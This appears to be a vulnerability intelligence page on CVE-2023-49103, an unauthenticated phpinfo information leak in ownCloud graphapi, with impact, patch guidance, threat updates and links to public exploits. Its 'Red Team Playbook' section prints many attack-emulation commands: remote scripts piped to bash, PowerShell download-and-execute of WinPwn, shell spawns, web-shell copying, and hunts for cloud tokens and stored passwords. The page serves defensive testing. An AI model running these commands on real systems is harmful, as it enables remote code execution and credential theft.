CVE-2023-49103
Overview
This vulnerability is an information disclosure flaw caused by improper exposure of PHP environment configuration via a third-party library integrated into the ownCloud graphapi app. The root cause lies in the GetPhpInfo.php component, which serves a URL endpoint revealing phpinfo output, including environment variables. The affected component is the ownCloud graphapi application versions 0.2.x prior to 0.2.1 and 0.3.x prior to 0.3.1, where this endpoint is accessible without authentication.
Vulnerability Description
An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system. Therefore, even if ownCloud is not running in a containerized environment, this vulnerability should still be a cause for concern. Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure.
Impact
An unauthenticated attacker can retrieve sensitive configuration details including all environment variables of the webserver, which in containerized deployments may contain critical secrets such as ownCloud admin passwords, mail server credentials, and license keys. This exposure facilitates credential theft and system reconnaissance, potentially enabling further attacks or lateral movement within the environment. No user interaction or authentication is required to exploit this vulnerability, increasing the risk of automated scanning and exploitation.
Solution
Remediation requires upgrading the ownCloud graphapi app to version 0.2.1 or later for the 0.2.x branch, or 0.3.1 or later for the 0.3.x branch, as specified in the ownCloud security advisories available at https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/. Disabling the graphapi app alone is insufficient. Users should consult the official ownCloud security page for detailed patch instructions and ensure deployments use updated container images released after February 2023 to avoid exposure.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the graphapi app of ownCloud is rooted in its reliance on a third-party library, GetPhpInfo.php, which inadvertently exposes sensitive configuration details of the PHP environment when accessed via a specific URL. This exposure includes critical information such as environment variables that may contain sensitive data, including the ownCloud admin password, mail server credentials, and license keys. The issue is particularly concerning in containerized deployments, where the risk of sensitive data leakage is amplified due to the nature of containerized environments sharing configurations and secrets. However, the vulnerability is not limited to such deployments; even in traditional setups, the exposure of phpinfo can provide attackers with a wealth of information that could facilitate further exploitation.
Attack vectors for this vulnerability are straightforward, as an attacker only needs to access the URL that triggers the GetPhpInfo.php library. Once this URL is accessed, the attacker can view the PHP configuration details, which may include paths, server configurations, and environment variables. In a scenario where an attacker has already gained some level of access to the ownCloud instance, this vulnerability could be exploited to escalate privileges or pivot to other systems within the network. Additionally, if the exposed information includes sensitive credentials, the attacker could directly compromise the ownCloud instance or other connected systems, leading to a broader security breach.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on ownCloud for file sharing and collaboration. The exposure of sensitive information can lead to unauthorized access to critical data, resulting in data breaches that may have legal, financial, and reputational repercussions. Organizations may face compliance issues, particularly if they handle sensitive personal data or are subject to regulations such as GDPR or HIPAA. The potential for data loss, coupled with the costs associated with incident response and recovery, underscores the business risk associated with this vulnerability.
To detect this vulnerability, organizations should conduct a thorough review of their ownCloud installations, focusing on the version of the graphapi app in use. Automated security scanning tools can help identify instances where the vulnerable library is present. Additionally, monitoring access logs for unusual requests to the phpinfo URL can aid in identifying potential exploitation attempts. Mitigation strategies include upgrading to the latest versions of the graphapi app, which address this vulnerability, and implementing strict access controls to limit exposure to sensitive configuration details. Disabling the graphapi app may reduce the attack surface but does not eliminate the underlying risk, making it essential for organizations to adopt a comprehensive security posture that includes regular updates, security audits, and employee training on security best practices.
In conclusion, the vulnerability present in the graphapi app of ownCloud represents a significant risk that can lead to severe consequences if left unaddressed. Organizations must prioritize the identification and remediation of this issue to safeguard their sensitive information and maintain the integrity of their systems. By understanding the technical details, potential attack vectors, real-world impacts, and effective detection and mitigation strategies, organizations can better protect themselves against the exploitation of this vulnerability and enhance their overall cybersecurity resilience.
CSURFACE threat intelligence has identified a notable surge in exploitation attempts targeting CVE-2023-49103, reflecting increased adversary interest in leveraging the ownCloud graphapi vulnerability. This uptick in activity coincides with the wider availability of multiple new proof-of-concept exploits on public repositories, which lower the barrier for threat actors to weaponize this flaw. Our telemetry indicates that attackers are increasingly focusing on containerized ownCloud deployments, where exposed environment variables can yield critical credentials and configuration data. Although the EPSS score remains high and stable, the growing detection trend underscores an elevated risk of compromise, particularly in environments lacking timely patching or adequate access controls. This development amplifies the urgency for defenders to prioritize monitoring for indicators associated with this vulnerability, as exploitation could facilitate unauthorized access and lateral movement within affected networks.
Update 2 — May 15, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-49103, accompanied by a reassessment of its severity to a critical CVSS score of 10.0. This change reflects a deeper understanding of the vulnerability’s potential impact, particularly in containerized ownCloud deployments where exposure of phpinfo() output can disclose highly sensitive environment variables, including administrative and service credentials. The increased telemetry signals a growing exploitation interest or scanning activity, underscoring that threat actors are actively probing for vulnerable instances. Additionally, the emergence of multiple publicly available proof-of-concept exploits and integration into popular penetration testing frameworks further lowers the barrier for adversaries to weaponize this flaw. Although the EPSS score remains stable at a high level, the combination of heightened detection and critical severity elevates the overall threat posture. Defenders should interpret this as an increased likelihood of targeted exploitation attempts, especially in environments with delayed patching or insufficient access restrictions, which could lead to unauthorized access and lateral movement within affected networks.
Update 3 — July 04, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-49103, indicating increased adversary interest and potential exploitation attempts. This surge coincides with a downward revision of the CVSS score from 10.0 to 7.5, reflecting a more nuanced understanding of the vulnerability’s impact, particularly the exposure of sensitive environment variables rather than direct remote code execution. Despite the lower CVSS rating, the elevated detection trend underscores that threat actors are actively probing affected ownCloud graphapi deployments, especially containerized environments where leaked credentials could facilitate lateral movement or privilege escalation. The stable yet high EPSS score confirms sustained exploitability, while the proliferation of publicly available proof-of-concept exploits and integration into penetration testing frameworks continues to lower the barrier for exploitation. Collectively, these developments heighten the threat level by increasing the likelihood of targeted attacks leveraging this information disclosure flaw, especially in organizations with delayed patching cycles or insufficient network segmentation.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Owncloud | Graph Api | 0.2.0 |
cpe:2.3:a:owncloud:graph_api:0.2.0:*:*:*:*:*:*:*
|
|
|
Owncloud | Graph Api | 0.3.0 |
cpe:2.3:a:owncloud:graph_api:0.3.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
ownCloud Phpinfo Reader
auxiliary/gather/owncloud_phpinfo_reader
|
h00die, creacitysec, Ron Bowes +2 | Unknown | - | View |
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
creacitysec/CVE-2023-49103
PoC for the CVE-2023-49103
|
creacitysec | 30 | 11 | 2023-11-22 | View |
|
merlin-ke/OwnCloud-CVE-2023-49103
OwnCloud CVE-2023-49103
|
merlin-ke | 0 | 2 | 2023-12-19 | View |
|
d0rb/CVE-2023-49103
This is a simple proof of concept for CVE-2023-49103.
|
d0rb | 0 | 0 | 2024-06-27 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-49103 |
| owncloud.org |
GitHub CVE
|
https://owncloud.org/security |
| owncloud.com |
GitHub CVE
|
https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-49103 |